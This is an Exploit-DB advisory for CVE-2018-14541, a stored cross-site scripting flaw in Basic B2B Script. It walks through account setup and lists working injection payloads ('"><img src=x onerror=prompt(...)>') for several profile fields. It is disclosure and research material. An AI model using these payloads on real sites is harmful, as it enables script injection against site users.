Basic B2B Script 2.0.0 - Cross-Site Scripting

EDB-ID: 45140 Author: Vikas Chaudhary Published: 2018-08-03
CVE: CVE-2018-14541 Type: Webapps Platform: PHP
Aliases: N/A Advisory/Source: N/A Tags: Cross-Site Scripting (XSS)
E-DB Verified: Waiting verification Exploit: Download Exploit Code Download / View Raw Vulnerable App: N/A
*******************************************************************************************
# Exploit Title:  PHP Scripts Mall Basic B2B Script 2.0.0 has  Stored XSS via the First name, Last name, Address 1, City, State, and Company name fields.
# Date: 20.07.2018
# Site Titel : B2B Script
# Vendor Homepage:  https://www.phpscriptsmall.com/
#Vendor Software : https://www.phpscriptsmall.com/product/professional-b2b-script/
# Software Link: http://readymadeb2bscript.com/basic-b2b/
# Category: Web Application
# Version: 2.0.9
# Exploit Author: Vikas Chaudhary
# Contact: https://www.facebook.com/profile.php?id=100011287630308
# Web:  https://gkaim.com/
#Published on : https://gkaim.com/cve-2018-14541-vikas-chaudhary/
# Tested on: Windows 10 -Firefox
# CVE- CVE-2018-14541

*****************************************************************************************
 
Proof of Concept:-
--------------------------
1. Go  to the  site (https://www.server.com/professional-b2b-script/ ).
2- Click on Join Free =>  Fill the Form and Create an Account  using your name email and soo on ...
3- Goto your mail and Verify it.
4-Come back to site and Login using your Verified Mail and Password.
6- When loged in ,goto My Profile  => Edit Profile and fill the these Scripts in given  parameter.

             in FIRST NAME =>         "><img src=x onerror=prompt(/VIKAS/)>
             in LAST NAME =>        "><img src=x onerror=prompt(/CHAUDHARY/)>
             in ADDRESS 1 =>            "><img src=x onerror=prompt(/MYAIM/)>
             in ADDRESS 2 =>     "><img src=x onerror=prompt(/GKAIM/)>
             in CITY =>       "><img src=x onerror=prompt(/HRFP/)>
             in STATE =>     "><img src=x onerror=prompt(/ETHICAL/)>
             in COMPANY NAME =>    "><img src=x onerror=prompt(/HACKER/)>

Now click on SUBMIT and refresh the page 


You will having popup of /VIKAS/  ,  /CHAUDHARY/ , / MYAIM/ .  /GKAIM/ , /HRPF/ , /ETHICAL/ , /HACKER/  in you account..

***************************************************************************************


Related Exploits

Trying to match CVEs (1): CVE-2018-14541
Other Possible E-DB Search Terms: Basic B2B Script 2.0.0,  Basic B2B Script
Date D V Title Author
2017-10-30 Waiting verification Basic B2B Script - SQL InjectionIhsan Sencan
2017-12-09 Verified Basic B2B Script 2.0.8 - 'product_details.php?id' SQL InjectionIhsan Sencan